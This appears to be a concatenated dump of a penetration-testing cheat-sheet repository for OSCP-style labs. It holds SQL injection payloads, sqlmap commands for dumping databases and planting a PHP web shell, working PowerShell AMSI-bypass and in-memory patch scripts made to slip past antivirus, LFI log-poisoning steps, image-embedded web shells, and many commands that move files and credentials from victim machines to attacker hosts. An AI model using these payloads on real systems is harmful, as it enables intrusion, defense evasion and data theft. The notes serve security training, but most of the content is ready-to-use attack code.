WHERE NOT IN ()); -- - 80 | example: or 1 in (SELECT TOP 1 CAST (password as varchar(4096)) FROM cms..cms_users WHERE password NOT IN ('P@ssw0rD!', 'Sup3rS3cur3!', 'Summer2020')); -- - 81 | 82 | # for more: https://perspectiverisk.com/mssql-practical-injection-cheat-sheet/ 83 | 84 | 85 | SQLITE: 86 | Blind SQL Injection: 87 | # boolean-based 88 | syntax : " AND (SELECT CASE WHEN ((SELECT hex(substr(,,1)) FROM
LIMIT ,1) = hex('')) then match(1,1) END))-- - 89 | example: " AND (SELECT CASE WHEN ((SELECT hex(substr(name,1,1)) FROM sqlite_master LIMIT 0,1) = hex('a')) then match(1,1) END))-- - 90 | -------------------------------------------------------------------------------- /databases/sql/sqlmap.txt: -------------------------------------------------------------------------------- 1 | Sqlmap is an sql injection automation tool, capable of finding and exploiting sql injections (NOT allowed on OSCP) 2 | 3 | Find sql injection vulnerabilities via url parameter: 4 | syntax : sqlmap -u 5 | example: sqlmap -u http://vulnsite.com/clients.php?id=150 6 | 7 | Sql injection exploits via url parameter: 8 | syntax : sqlmap -u --dbms= --dump --threads=5 9 | example: sqlmap -u http://vulnsite.com/clients.php?id=150 --dbms/-D=mssql --dump --threads=5 10 | example: sqlmap -u http://vulnsite.com/clients.php?id=150 --dbms/-D=mysql --os-shell 11 | 12 | Sql injection on a login form with POST data: 13 | syntax : sqlmap -u --data="" 14 | example: sqlmap -u http://www.vulnserver.com/login.php --data="username=admin&password=admin" --dump 15 | 16 | Sql injection on a login form with POST data via Burp request: 17 | step 1 : make the POST request in burp and send to repeater 18 | Step 2 : in repeater tab, right click the content screen and copy to file -> 19 | Step 3 : sqlmap -r 20 | 21 | Upload a file via sqlmap: 22 | syntax : sqlmap -u --data="" --file-write= --file-dest= 23 | example: sqlmap -u http://10.10.10.167/view_product.php --data="productId=32" --file-write=./bobeye.php --file-dest=c:\inetpub\wwwroot\bobeye.php 24 | -------------------------------------------------------------------------------- /defense_evasion/amsi/AmsiInitFailed.ps1: -------------------------------------------------------------------------------- 1 | # Powershell script to set AmsiInitFailed to true to disable AMSI 2 | # DO NOT COPY-PASTE HERE, THE COMMENTS WILL TRIGGER AV DUE TO AMSIUTILS BEING MENTIONED 3 | 4 | $niks = $null 5 | $waar = $true 6 | 7 | # loop through all assembly types to get the AmsiUtils class 8 | $a=[Ref].Assembly.GetTypes() 9 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 10 | 11 | # loop through all non-public, static attributes in the AmsiUtils class and grab the AmsiInitFailed field 12 | $d=$c.GetFields('NonPublic,Static') 13 | Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}} 14 | 15 | # set the AmsiInitFailed field to true 16 | $f.SetValue($niks, $waar) 17 | 18 | 19 | ### COPY-PASTE HERE 20 | 21 | $niks = $null 22 | $waar = $true 23 | 24 | $a=[Ref].Assembly.GetTypes() 25 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 26 | 27 | $d=$c.GetFields('NonPublic,Static') 28 | Foreach($e in $d) {if ($e.Name -like "*itFailed") {$f=$e}} 29 | 30 | $f.SetValue($niks, $waar) 31 | -------------------------------------------------------------------------------- /defense_evasion/amsi/AmsiPatchInMemory.ps1: -------------------------------------------------------------------------------- 1 | # Patch AMSI's AmsiOpenSession function in-memory using the Win32 API. 2 | # We resolve the functions from kernel32 dynamically in Powershell to prevent dropping temporary files to disk via .NET assembly loading, for example 3 | 4 | # function to dynamically lookup functions in system dll's at runtime 5 | function LookupFunc { 6 | Param ($moduleName, $functionName) 7 | $assem = ([AppDomain]::CurrentDomain.GetAssemblies() | 8 | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1]. 9 | Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') 10 | $tmp=@() 11 | $assem.GetMethods() | ForEach-Object {If($_.Name -eq "GetProcAddress") {$tmp+=$_}} 12 | return $tmp[0].Invoke($null, @(($assem.GetMethod('GetModuleHandle')).Invoke($null, @($moduleName)), $functionName)) 13 | } 14 | 15 | # function to create delegate types for Win32 API functions 16 | function getDelegateType { 17 | Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $func,[Parameter(Position = 1)] [Type] $delType = [Void]) 18 | 19 | $type = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), 20 | [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false). 21 | DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) 22 | 23 | $type.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $func). 24 | SetImplementationFlags('Runtime, Managed') 25 | 26 | $type.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $delType, $func).SetImplementationFlags('Runtime, Managed') 27 | return $type.CreateType() 28 | } 29 | 30 | [IntPtr]$funcAddr = LookupFunc amsi.dll AmsiOpenSession 31 | $oldProtectionBuffer = 0 32 | $vp=[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((LookupFunc kernel32.dll VirtualProtect), 33 | (getDelegateType @([IntPtr], [UInt32], [UInt32], [UInt32].MakeByRefType()) ([Bool]))) 34 | $vp.Invoke($funcAddr, 3, 0x40, [ref]$oldProtectionBuffer) 35 | $buf = [Byte[]] (0x48, 0x31, 0xC0) 36 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $funcAddr, 3) 37 | $vp.Invoke($funcAddr, 3, 0x20, [ref]$oldProtectionBuffer) 38 | -------------------------------------------------------------------------------- /defense_evasion/amsi/OverwriteAmsiContext.ps1: -------------------------------------------------------------------------------- 1 | # Powershell script to overwrite AmsiContext with null bytes to force AMSI to throw errors 2 | # DO NOT COPY-PASTE HERE, THE COMMENTS WILL TRIGGER AV DUE TO AMSIUTILS BEING MENTIONED 3 | 4 | # loop through all assembly types to get the AmsiUtils class 5 | $a=[Ref].Assembly.GetTypes() 6 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 7 | 8 | # loop through all non-public, static attributes in the AmsiUtils class and grab AmsiContext 9 | $d=$c.GetFields('NonPublic,Static') 10 | Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}} 11 | 12 | # get address of AmsiContext, convert it to hex and overwrite it with 0 13 | $g=$f.GetValue($null) 14 | [IntPtr]$ptr=$g 15 | [Int32[]]$buf=@(0) 16 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) 17 | 18 | 19 | ### COPY-PASTE HERE 20 | 21 | $a=[Ref].Assembly.GetTypes() 22 | Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}} 23 | 24 | $d=$c.GetFields('NonPublic,Static') 25 | Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}} 26 | 27 | $g=$f.GetValue($null) 28 | [IntPtr]$ptr=$g 29 | [Int32[]]$buf=@(0) 30 | [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) 31 | -------------------------------------------------------------------------------- /development/cross-compile.txt: -------------------------------------------------------------------------------- 1 | Install cross-compiler: apt-get install mingw-w64 2 | 3 | Cross-compile source code from linux to windows 32-bit: 4 | 5 | syntax : /usr/bin/i686-w64-mingw32-gcc -o 6 | example: /usr/bin/i686-w64-mingw32-gcc vuln.c -o vuln.exe 7 | 8 | 9 | Cross-compile source code from linux to windows 64-bit: 10 | 11 | syntax : x86_64-w64-mingw32-gcc -o 12 | example: x86_64-w64-mingw32-gcc shell.c -o shell.exe 13 | 14 | 15 | Compile a C/C++ file for 32-bit: 16 | 17 | syntax : gcc -o -m32 18 | example: gcc kernelExploit.c -o kernelExploit -m32 19 | -------------------------------------------------------------------------------- /development/nasm.txt: -------------------------------------------------------------------------------- 1 | Use nasm to compile Assembly programs: 2 | 3 | Compile x86 Assembly for Linux: 4 | Step 1: nasm -f elf32 .asm -o .o 5 | Step 2: ld -m elf_i386 .o -o 6 | Optional: 7 | Step 2: gcc -m32 .o -o 8 | # use this if you're using external functions from C (use `global main`, instead of `global _start`) 9 | 10 | Compile x86_64 Assembly for Linux: 11 | Step 1: nasm -f elf64 .asm -o .o 12 | Step 2: ld -m elf_x86_64 .o -o 13 | Optional: 14 | Step 2: gcc .o -o 15 | # use this if you're using external functions from C (use `global main`, instead of `global _start`) 16 | 17 | -------------------------------------------------------------------------------- /file_inclusion/lfi.txt: -------------------------------------------------------------------------------- 1 | Use php local file inclusion + log poisoning to get remote command execution: 2 | 3 | Step 1(host): 4 | syntax : nc -nv 5 | example: nc -nv 10.23.12.32 80 6 | 7 | Step 2(host): 8 | # Entering this over a netcat session might log it into the target's log files, 9 | allowing us to display and execute the php line via local file inclusion. 10 | 11 | Step 3(host): 12 | syntax : http://vulnsite.com/vuln.php?cmd=&language=../../../../../../ 13 | example: http://vulnsite.com/vuln.php?cmd=whoami&language=../../../../../../var/html/www/access.log 14 | # The logfiles might be in different locations, depending on the target system 15 | 16 | Php local file inclusion base64 method: 17 | 18 | example: http://vulnsite.com/?page=php://filter/convert.base64-encode/resource=config 19 | example: http://vulnsite.com/?page=php://filter/convert.base64-encode/resource=upload 20 | example: http://vulnsite.com/browse.php?lang=php://filter/convert.base64-encode/resource=index.php HTTP/1.1 21 | 22 | 23 | Php upload file bypass by embeddig php code into image/gif files: 24 | 25 | #'pikachu.gif' is a random gif I found on the internet, 'shell.php' is the file that contains the malicious php code 26 | 27 | GIF file with php code via gifsicle: 28 | 29 | syntax : gifsicle < .gif --comment '' > .php.gif 30 | example: gifsicle < pikachu.gif --comment "" > output.php.gif 31 | 32 | 33 | JPG file with php code via python: 34 | 35 | Step 1: python 36 | Step 2: aRandomName = open ('pikachu.gif','rb').read() 37 | Step 3: aRandomName += open ('shell.php','rb').read() 38 | Step 4: open ('newshell.php.jpg','wb').write(aRandomName) 39 | -------------------------------------------------------------------------------- /file_inclusion/uploadFile.txt: -------------------------------------------------------------------------------- 1 | Check 'Hackthebox: Bastard' and Ippsec's video on it (https://www.youtube.com/watch?v=lP-E5vmZNC0 @ 6:40) 2 | 3 | $phpCode = <<<'EOD' 4 | " . shell_exec($_REQUEST['fexec']) . ""; 11 | }; 12 | ?> 13 | EOD; 14 | -------------------------------------------------------------------------------- /filetransfer/base64.txt: -------------------------------------------------------------------------------- 1 | Transfer files via base64: 2 | 3 | Linux: 4 | Step 1(victim): cat | base64 -w 0 | xclip ### xclip copies the output to your clipboard, so you can paste the base64. It's not always available, though. 5 | Step 2(host) : echo | base64 -d > file 6 | 7 | 8 | Windows (some are powershell-only): 9 | Step 1(victim): $fc = Get-Content 10 | Step 2(victim): $fe = [System.Text.Encoding]::UTF8.GetBytes($fc) # [System.Text.Encoding]::Unicode.GetBytes() 11 | Step 3(victim): [System.Convert]::ToBase64String($fe) 12 | 13 | 14 | Step 1(target): certutil -encode && findstr /v /c:- > 15 | Optional step 1(target): certutil -decode 16 | 17 | Example: 18 | certutil -encode data.txt tmp.b64 && findstr /v /c:- tmp.b64 > data.b64 19 | certutil -decode data.b64 data.txt 20 | -------------------------------------------------------------------------------- /filetransfer/dev_tcp.txt: -------------------------------------------------------------------------------- 1 | Example with a limited shell 2 | 3 | Step 1(host) : nc -lvnp < file.Txt 4 | Step 2(target): bash -c "cat < /dev/tcp// > ./file.txt" 5 | 6 | Don't use 'bash -c' if you have a working bash shell. 7 | -------------------------------------------------------------------------------- /filetransfer/ftp_commands.txt: -------------------------------------------------------------------------------- 1 | Transfer via ftp from a windows box: 2 | 3 | Step 1(attacker): sudo python -m pyftpdlib -p 21 ##or don't specify port and it uses 2121 4 | Step 2(victim) : echo the following commands into a file, then run that file with ftp 5 | 6 | ### Note that there's no spaces between the commands and the '>>' operator, this is required for the script to work! 7 | echo "open ">>ftper 8 | echo "">>ftper ##anonymous 9 | echo "">>ftper ##anonymous (anything works) 10 | echo "passive">>ftper 11 | echo "binary">>ftper 12 | echo "get ">>ftper 13 | #echo "put ">>ftper 14 | echo "disconnect">>ftper 15 | #echo "quit">>ftper 16 | #echo "bye">>ftper 17 | 18 | ftp -v -s:ftper 19 | -------------------------------------------------------------------------------- /filetransfer/ftp_server.txt: -------------------------------------------------------------------------------- 1 | sudo python -m pyftpdlib -p 21 2 | -------------------------------------------------------------------------------- /filetransfer/http_server.txt: -------------------------------------------------------------------------------- 1 | Transfer files if python is on the box: 2 | 3 | Step 1(host) : python -m SimpleHTTPServer / python3 http.server 4 | Step 2(target): curl :/file > file 5 | 6 | Alternate step 2(host): wget http://:/filename # Go into /tmp if permission denied 7 | -------------------------------------------------------------------------------- /filetransfer/nc.txt: -------------------------------------------------------------------------------- 1 | Transfer files via nc: 2 | 3 | Linux: 4 | Transfer a file from attacker to victim: 5 | Step 1(victim) : nc -lvnp > 6 | Step 2(attacker): nc < 7 | 8 | Windows: 9 | Transfer a file from victim to attacker (upload nc.exe first or execute it through your smb server): 10 | Step 1(attacker): nc -lvnp > 11 | Step 2(victim) : type | .\nc.exe 12 | -------------------------------------------------------------------------------- /filetransfer/nginx_file_transfer.txt: -------------------------------------------------------------------------------- 1 | https://www.youtube.com/watch?v=7ifJOon5-G8 @ 15:00 #Ippsec Olympus htb 2 | 3 | Uploading files via nginx: 4 | 5 | Linux: 6 | syntax : curl --upload-file : 7 | example: curl --upload-file creds.txt 10.12.15.67:9090 8 | 9 | Windows powershell: 10 | Step 1(target) : $text = Get-Content .\ -Raw 11 | Optional step 1: $text = [IO.File]::ReadAllText(".\") 12 | 13 | syntax : powershell -c 'Invoke-RestMethod -Method -Uri "http://:/" -Body $' 14 | example: powershell -c 'Invoke-RestMethod -Method PUT -Uri "http://10.13.12.20:9090/file.txt" -Body $text' 15 | 16 | -------------------------------------------------------------------------------- /filetransfer/nginx_setup.txt: -------------------------------------------------------------------------------- 1 | https://www.youtube.com/watch?v=7ifJOon5-G8 @ 15:00 #Ippsec Olympus htb 2 | 3 | Setting up nginx for file uploads: 4 | 5 | Step 1(host): mkdir /var/www/upload 6 | Step 2(host): touch /etc/nginx/sites-available/file_upload 7 | Step 3(host): enter the following in 'file_upload': 8 | 9 | server { 10 | listen 9090 default_server; 11 | server_name hackerman.com; 12 | location / { 13 | root /var/www/upload; 14 | dav_methods PUT; 15 | } 16 | } 17 | 18 | 19 | Step 4(host): ln -s /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload 20 | Step 5(host): systemctl nginx 21 | Step 6(host): chown www-data /var/www/upload/ 22 | Step 7(host): chmod 777 /var/www/upload/ 23 | -------------------------------------------------------------------------------- /filetransfer/rsync.txt: -------------------------------------------------------------------------------- 1 | Transfer files from and to an rsync server: 2 | https://www.tecmint.com/rsync-local-remote-file-synchronization-commands/ 3 | 4 | flags: -v = verbose -r = copy data recursively -a = copy data recursively and preserve symbolic links, file permissions, user & group ownerships... 5 | -z = compress file data -h = human-readable format 6 | 7 | 8 | Transfer files on a local machine: 9 | 10 | syntax : rsync 11 | example: rsync ./passwords.tar /tmp/passwords/ 12 | 13 | Transfer files from a local machine to a remote rsync server: 14 | 15 | syntax : rsync @: 16 | example: rsync ./passwords/ randy@10.10.23.11:/home/randy/ 17 | 18 | Transfer files from a remote rsync server to a local machine: 19 | 20 | syntax : rsync @: 21 | example: rsync randy@10.10.23.11/home/randy/passwords /tmp/passwords 22 | -------------------------------------------------------------------------------- /filetransfer/scp.txt: -------------------------------------------------------------------------------- 1 | SCP is a file-transfer method that works via ssh. 2 | 3 | Transfer local files to remote machine: 4 | syntax : scp @: 5 | example: scp file.bak admin@192.168.84.34:/home/admin 6 | 7 | Transfer remote files to local machine: 8 | syntax : scp @: 9 | example: scp root@10.13.13.38:/root/capture.pcap ./ 10 | -------------------------------------------------------------------------------- /filetransfer/smb.txt: -------------------------------------------------------------------------------- 1 | Transfer files via smb: 2 | 3 | Step 1(attacker) : sudo python /opt/smbserver.py ### sudo python /opt/smbserver.py 10.10.x.x TEST /root/Desktop 4 | Optional(attacker): smbclient -L --no-pass ### check connection 5 | Optional(victim) : net view \\ 6 | Step 2(victim) : copy \\\\file.exe ./ 7 | 8 | 9 | OR Windows: 10 | 11 | Step 1(attacker): sudo impacket-smbserver ./ # sudo impacket-smbserver -smb2support files ./ 12 | Step 2(victim) : powershell -nop -c 'xcopy \\\\ C:\\Users\\AppData\Local\Temp\' 13 | Alternate step 2(victim): copy \\\\ ./ 14 | -------------------------------------------------------------------------------- /filetransfer/smb_server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # SECUREAUTH LABS. Copyright 2018 SecureAuth Corporation. All rights reserved. 3 | # 4 | # This software is provided under under a slightly modified version 5 | # of the Apache Software License. See the accompanying LICENSE file 6 | # for more information. 7 | # 8 | # Simple SMB Server example. 9 | # 10 | # Author: 11 | # Alberto Solino (@agsolino) 12 | # 13 | 14 | import sys 15 | import argparse 16 | import logging 17 | 18 | from impacket.examples import logger 19 | from impacket import smbserver, version 20 | from impacket.ntlm import compute_lmhash, compute_nthash 21 | 22 | if __name__ == '__main__': 23 | 24 | # Init the example's logger theme 25 | logger.init() 26 | print version.BANNER 27 | 28 | parser = argparse.ArgumentParser(add_help = True, description = "This script will launch a SMB Server and add a " 29 | "share specified as an argument. You need to be root in order to bind to port 445. " 30 | "No authentication will be enforced. Example: smbserver.py -comment 'My share' TMP " 31 | "/tmp") 32 | 33 | parser.add_argument('shareName', action='store', help='name of the share to add') 34 | parser.add_argument('sharePath', action='store', help='path of the share to add') 35 | parser.add_argument('-comment', action='store', help='share\'s comment to display when asked for shares') 36 | parser.add_argument('-username', action="store", help='Username to authenticate clients') 37 | parser.add_argument('-password', action="store", help='Password for the Username') 38 | parser.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes for the Username, format is LMHASH:NTHASH') 39 | parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON') 40 | parser.add_argument('-ip', '--interface-address', action='store', default='0.0.0.0', help='ip address of listening interface') 41 | parser.add_argument('-port', action='store', default='445', help='TCP port for listening incoming connections (default 445)') 42 | parser.add_argument('-smb2support', action='store_true', default=False, help='SMB2 Support (experimental!)') 43 | 44 | if len(sys.argv)==1: 45 | parser.print_help() 46 | sys.exit(1) 47 | 48 | try: 49 | options = parser.parse_args() 50 | except Exception, e: 51 | logging.critical(str(e)) 52 | sys.exit(1) 53 | 54 | if options.debug is True: 55 | logging.getLogger().setLevel(logging.DEBUG) 56 | else: 57 | logging.getLogger().setLevel(logging.INFO) 58 | 59 | if options.comment is None: 60 | comment = '' 61 | else: 62 | comment = options.comment 63 | 64 | server = smbserver.SimpleSMBServer(listenAddress=options.interface_address, listenPort=int(options.port)) 65 | 66 | server.addShare(options.shareName.upper(), options.sharePath, comment) 67 | server.setSMB2Support(options.smb2support) 68 | 69 | # If a user was specified, let's add it to the credentials for the SMBServer. If no user is specified, anonymous 70 | # connections will be allowed 71 | if options.username is not None: 72 | # we either need a password or hashes, if not, ask 73 | if options.password is None and options.hashes is None: 74 | from getpass import getpass 75 | password = getpass("Password:") 76 | # Let's convert to hashes 77 | lmhash = compute_lmhash(password) 78 | nthash = compute_nthash(password) 79 | elif options.password is not None: 80 | lmhash = compute_lmhash(options.password) 81 | nthash = compute_nthash(options.password) 82 | else: 83 | lmhash, nthash = options.hashes.split(':') 84 | 85 | server.addCredential(options.username, 0, lmhash, nthash) 86 | 87 | # Here you can set a custom SMB challenge in hex format 88 | # If empty defaults to '4141414141414141' 89 | # (remember: must be 16 hex bytes long) 90 | # e.g. server.setSMBChallenge('12345678abcdef00') 91 | server.setSMBChallenge('') 92 | 93 | # If you don't want log to stdout, comment the following line 94 | # If you want log dumped to a file, enter the filename 95 | server.setLogFile('') 96 | 97 | # Rock and roll 98 | server.start() 99 | -------------------------------------------------------------------------------- /filetransfer/windows/tftp.txt: -------------------------------------------------------------------------------- 1 | Transfer files via tftp, which is quite old, but can still be available: 2 | 3 | Step 1(host) : atftpd --daemon --port 69 #Specify which directory will be open to transactions 4 | Step 2(victim): tftp -i 5 | 6 | Example: tftp -i 192.168.0.124 GET remoteFile.txt 7 | Example: tftp -i 192.168.0.124 PUT localFile.txt 8 | -------------------------------------------------------------------------------- /filetransfer/windows/vbs.txt: -------------------------------------------------------------------------------- 1 | Transfer files to windows via a vbs script: 2 | 3 | Step 1(victim): Execute following script on the target machine 4 | 5 | echo strUrl = WScript.Arguments.Item(0) > wget.vbs 6 | echo StrFile = WScript.Arguments.Item(1) >> wget.vbs 7 | echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs 8 | echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs 9 | echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs 10 | echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs 11 | echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs 12 | echo Err.Clear >> wget.vbs 13 | echo Set http = Nothing >> wget.vbs 14 | echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs 15 | echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs 16 | echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs 17 | echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs 18 | echo http.Open "GET", strURL, False >> wget.vbs 19 | echo http.Send >> wget.vbs 20 | echo varByteArray = http.ResponseBody >> wget.vbs 21 | echo Set http = Nothing >> wget.vbs 22 | echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs 23 | echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs 24 | echo strData = "" >> wget.vbs 25 | echo strBuffer = "" >> wget.vbs 26 | echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs 27 | echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs 28 | echo Next >> wget.vbs 29 | echo ts.Close >> wget.vbs 30 | 31 | Step 2(host) : open http server 32 | Step 3(victim): 33 | 34 | syntax : cscript wget.vbs http://:/ 35 | example: cscript wget.vbs http://192.168.0.213:8000/vuln.exe vuln.exe 36 | -------------------------------------------------------------------------------- /filetransfer/windows/web_request.txt: -------------------------------------------------------------------------------- 1 | Transfer files via http with powershell: 2 | example: (New-Object System.Net.WebClient).DownloadFile('http://:/','C:\Users\\Desktop\') 3 | 4 | Transfer files with cmd.exe certutil (WILL GET CAUGHT BY ANTIVIRUS): 5 | Step 2(victim): certutil -urlcache -split -f http://:/ C:\\Users\\\\Downloads\\ 6 | -------------------------------------------------------------------------------- /filetransfer/windows/webrequest.txt: -------------------------------------------------------------------------------- 1 | Download a file from victim to attacker host via powershell webrequest: 2 | 3 | Step 1(host) : python -m SimpleHTTPServer 4 | Step 2(target): $url = "http://:/" 5 | Step 3(target): $output = "" 6 | Step 3(target): Invoke-WebRequest -Uri $url -OutFile $output 7 | -------------------------------------------------------------------------------- /filetransfer/windows/wget.txt: -------------------------------------------------------------------------------- 1 | Use Powershell wget to transfer files to Windows 2 | 3 | Step 1(host): download 'wget.exe' from the internet 4 | Step 1(host): open http server where the binary is located 5 | Step 3(host): transfer the 'wget.exe' to the victim box 6 | 7 | Step 4(victim): 8 | syntax : wget.exe http://:/ 9 | example: wget.exe http://192.168.0.145:8000/vuln.exe 10 | -------------------------------------------------------------------------------- /filetransfer/windows/winrm.txt: -------------------------------------------------------------------------------- 1 | Download and upload files via winrm: 2 | 3 | Step 1: Connect to the windows box via winrm 4 | # evil-winrm -i -u -p 5 | 6 | Download: While in the evil-winrm shell, download files from the victim box (Windows) to the attacker box (Kali Linux) 7 | syntax : download 8 | example: download C:\Users\Administrator\Documents\secrets.txt /home/hackerman/loot/secrets.txt 9 | 10 | Upload: While in the evil-winrm shell, upload files from the attacker box (Kali Linux) to the victim box (Windows) 11 | syntax : upload 12 | example: upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe C:\Windows\Temp\mimikatz.exe 13 | -------------------------------------------------------------------------------- /forensics/convert.txt: -------------------------------------------------------------------------------- 1 | Convert a raw screen dump to a png file: 2 | 3 | Step 1(victim) : cat /sys/class/graphics/fb0/virtual_size # get virtual size dimensions of data (1176, 885 in this case) 4 | Step 2(attacker): ./iraw2png.pl 1176 885 < screen.raw > screen.png # check 'Scripts' folder for the perl script 5 | 6 | -------------------------------------------------------------------------------- /forensics/dit.txt: -------------------------------------------------------------------------------- 1 | When you have a .dit file, follow this guide: https://blog.ropnop.com/extracting-hashes-and-domain-info-from-ntds-dit/ 2 | -------------------------------------------------------------------------------- /forensics/luks_encrypted.txt: -------------------------------------------------------------------------------- 1 | Mount LUKS encrypted file (https://askubuntu.com/questions/835525/how-to-mount-luks-encrypted-file/835532#835532): 2 | 3 | Step 1: modprobe dm-crypt # Make sure 'dm-crypt' kernel module is loaded 4 | Step 2: cryptsetup open --type luks /path/to/ 5 | Step 3: mount /dev/mapper/ /mnt 6 | 7 | Bruteforce LUKS password (https://articles.forensicfocus.com/2018/02/22/bruteforcing-linux-full-disk-encryption-luks-with-hashcat/): 8 | 9 | Step 1: dd if= of=.dd bs=512 count=4079 10 | Step 2: hashcat -m 14600 -a 0 -w 3 --force 11 | 12 | 13 | Dump LUKS file info: 14 | 15 | example: cryptsetup luksDump 16 | 17 | 18 | Extract hashes from LUKS file from ram memory(https://0x00sec.org/t/breaking-encryption-hashed-passwords-luks-devices/811): 19 | 20 | Step 1: get LiME (https://github.com/504ensicsLabs/LiME) 21 | Step 2: 22 | -------------------------------------------------------------------------------- /forensics/volatility.txt: -------------------------------------------------------------------------------- 1 | Use volatility to scan memory dumps 2 | 3 | Step 1: 4 | syntax : volatility -f